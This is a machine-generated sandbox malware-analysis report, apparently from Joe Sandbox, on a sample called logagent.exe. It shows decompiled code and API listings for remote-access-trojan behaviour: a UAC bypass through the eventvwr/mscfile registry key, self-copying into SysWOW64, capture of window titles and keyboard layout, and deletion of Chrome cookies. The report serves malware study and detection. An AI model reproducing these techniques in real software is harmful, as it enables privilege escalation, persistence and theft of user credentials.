                                  						 *(_t68 + 0x44) =  *(_t68 + 0x44) & 0x00000000;
                                  					}
                                  					_t16 = _t68 + 0x3c; // 0xa
                                  					if( *_t16 != _a4) {
                                  						GetLocalTime( &_v24);
                                  						_t42 =  &_v5;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t42, "KeepAlive Timeout changed to %i\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
                                  						_t43 =  &_v56;
                                  						L00414170();
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t43, _t42);
                                  						printf(_t43);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					}
                                  				}
                                  				 *(_t68 + 0x40) =  *(_t68 + 0x40) & 0x00000000;
                                  				 *((intOrPtr*)(_t68 + 0x3c)) = _a4;
                                  				return 1;
                                  			}
                                  Address column of the decompiled listing above: statements span 0x0040263e to 0x00402749 (0x00000000 marks return paths)

                                  APIs
                                  • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 0040266F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,?,?,?,?,?,?,00000000,0041BE70), ref: 00402699
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 004026A4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 004026AE
                                  • printf.MSVCRT ref: 004026B5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C6
                                  • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 004026DC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Timeout changed to %i,?,?,?,?,?,?,00000000,0041BE70), ref: 00402706
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 00402711
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 0040271B
                                  • printf.MSVCRT ref: 00402722
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040272A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402733
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds$KeepAlive Timeout changed to %i
                                  • API String ID: 1710008465-2297210016
                                  • Opcode ID: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                  • Instruction ID: 321b724c115d66eaa185a9bbc978540a18db294c5fd1e2a1f117f764d6d2d181
                                  • Opcode Fuzzy Hash: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                  • Instruction Fuzzy Hash: 33313672800608FFCB10DBE4DD49AEEB7BCAF54705F104466F941E3190D7B9AA85CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040313B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403144
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040314E
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403159
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040316A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Windows\SysWOW64\logagent.exe,?), ref: 0040318F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 004031BF
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004031CC
                                  • exit.MSVCRT ref: 004031D8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004031E1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004031EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@ExecuteG@1@@Shellexit
                                  • String ID: C:\Windows\SysWOW64\logagent.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                  • API String ID: 2587331422-612517957
                                  • Opcode ID: a5ebd1b7af4b3a5ca78ff19befb282818f4df8a2bf83191de05e9f26773c89a6
                                  • Instruction ID: 58015f3fb9c85f75900a894e30fbe76f83cf12f03c76df5784ad0d5e993c1cb0
                                  • Opcode Fuzzy Hash: a5ebd1b7af4b3a5ca78ff19befb282818f4df8a2bf83191de05e9f26773c89a6
                                  • Instruction Fuzzy Hash: 25219A72640505FBD700ABA1DD8AEEF772CDB84745F10407AF512B61D0DBB85A4187BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D665
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D68C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D69F
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6BA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D6C3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D6D9
                                    • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                    • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                    • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D6F3
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D704
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D711
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D734
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D74B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@??3@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                  • String ID: C:\Windows\SysWOW64\logagent.exe$open
                                  • API String ID: 2112629403-468372309
                                  • Opcode ID: 50475a9cfbc78c3b4d15a830515efdd2aa11e385f63a67c81f68d873a2421c2f
                                  • Instruction ID: 3c6387fd113382c931602557de23b741b53e110e960cdbc023917b4df3b65b40
                                  • Opcode Fuzzy Hash: 50475a9cfbc78c3b4d15a830515efdd2aa11e385f63a67c81f68d873a2421c2f
                                  • Instruction Fuzzy Hash: 94317C72910519EBCB04BBE1EC999FE7778AF54356B40487EF412A30E1EE785A04CB28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetKeyboardLayoutNameA.USER32(00000000), ref: 0040D9AF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D9BA
                                    • Part of subcall function 00412E83: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412E9D
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D9FC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 0040DA11
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040DA21
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA31
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA3E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA4B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA55
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 0040DA6C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA75
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA81
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA8D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA99
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAA5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                  • String ID:
                                  • API String ID: 3751107300-0
                                  • Opcode ID: e15c7601431557eb5434d33a6cd385f90947e193a142b4115c909fdae08809a5
                                  • Instruction ID: 7445f7784f172681db4ab6ed8b3104eac86986a278aabc0f04733adb6ce879a5
                                  • Opcode Fuzzy Hash: e15c7601431557eb5434d33a6cd385f90947e193a142b4115c909fdae08809a5
                                  • Instruction Fuzzy Hash: 39310EB280051DABCB05ABE1EC49EEEBB7CBB54305F04447AF506E3061EF745689CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetWindowTextW.USER32 ref: 0040EAAF
                                  • IsWindowVisible.USER32 ref: 0040EAB8
                                  • sprintf.MSVCRT ref: 0040EACF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040EAE6
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,?,004169C4,00000000,004169C8), ref: 0040EB20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,00000000,004169C8), ref: 0040EB2D
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00000000,004169C8), ref: 0040EB3A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB57
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB65
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB71
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB7A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB83
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB8C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB95
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB9E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBA7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBB0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$G@2@@std@@G@std@@V10@$??0?$basic_string@$D@1@@Window$?c_str@?$basic_string@?length@?$basic_string@G@1@@TextV01@V01@@V10@0@VisibleY?$basic_string@_itoasprintf
                                  • String ID:
                                  • API String ID: 1480451481-0
                                  • Opcode ID: 50da3bbc057abd5acd65f029f9e80a750645bf4947171fce649c792d00c8bacc
                                  • Instruction ID: 896110e7d44d4e8721ff4af176c5386cc18dfd6a0cdb0307768c484521d74486
                                  • Opcode Fuzzy Hash: 50da3bbc057abd5acd65f029f9e80a750645bf4947171fce649c792d00c8bacc
                                  • Instruction Fuzzy Hash: 0031BEB2C0060DEBDB05ABE0EC49DDE7B7CAB54305F108026F526E6061EB759699CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • wcslen.MSVCRT ref: 105497D5
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 105497F3
                                  • wcscmp.MSVCRT ref: 1054986F
                                  • CopyFileW.KERNEL32(C:\Windows\SysWOW64\logagent.exe,00000000), ref: 105498B4
                                  • wcslen.MSVCRT ref: 105498CF
                                  • CopyFileW.KERNEL32(C:\Windows\SysWOW64\logagent.exe,00000000), ref: 10549955
                                  • wcslen.MSVCRT ref: 105499B1
                                  • _wgetenv.MSVCRT ref: 105499DA
                                  • ShellExecuteW.SHELL32(00000000,0041578C,00000000), ref: 10549BAB
                                  • exit.MSVCRT ref: 10549BB7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: wcslen$CopyFile$CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                  • String ID: $ZA$(VA$6$<bA$C:\Windows\SysWOW64\logagent.exe
                                  • API String ID: 2471365703-1191138858
                                  • Opcode ID: 6595a01bfefbc4d7711554f92850df2a30bf25d81cb68a59afe5877ef214b2a6
                                  • Instruction ID: 5e4b0d8fd0361055a690d1d732cd05f8d76ce01087c66126235fad2caaebaba2
                                  • Opcode Fuzzy Hash: 6595a01bfefbc4d7711554f92850df2a30bf25d81cb68a59afe5877ef214b2a6
                                  • Instruction Fuzzy Hash: 4CC12B7290051DEBCB05ABE0EC5DDEE7B7CFF98255B54802AF912D30A0EB759904CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 32%
                                  			E004071CF() {
                                  				char _v5;
                                  				char _v6;
                                  				char _v24;
                                  				void* _v40;
                                  				char* _t12;
                                  				CHAR* _t13;
                                  				long _t20;
                                  				char* _t21;
                                  				void* _t25;
                                  
                                  				_t12 = getenv("UserProfile");
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                                  				_t13 =  &_v24;
                                  				L00414170();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				if(DeleteFileA(_t13) != 0) {
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
                                  					E00407A90("\n[Chrome Cookies found, cleared!]");
                                  					_t25 = 1;
                                  					L8:
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return _t25;
                                  				}
                                  				_t20 = GetLastError();
                                  				if(_t20 == 0) {
                                  					_t21 =  &_v6;
                                  					L5:
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
                                  					E00407A90("\n[Chrome Cookies not found]");
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return 1;
                                  				}
                                  				if(_t20 == 1) {
                                  					_t21 =  &_v5;
                                  					goto L5;
                                  				}
                                  				_t25 = 0;
                                  				goto L8;
                                  			}

                                  APIs
                                  • getenv.MSVCRT ref: 004071E4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071EF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004071FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407205
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040720E
                                  • DeleteFileA.KERNEL32(00000000), ref: 00407215
                                  • GetLastError.KERNEL32 ref: 0040721F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],00000000), ref: 0040723E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],00000000), ref: 00407271
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407284
                                  Strings
                                  • [Chrome Cookies not found], xrefs: 00407239
                                  • [Chrome Cookies found, cleared!], xrefs: 0040726C
                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004071D9
                                  • UserProfile, xrefs: 004071DF
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
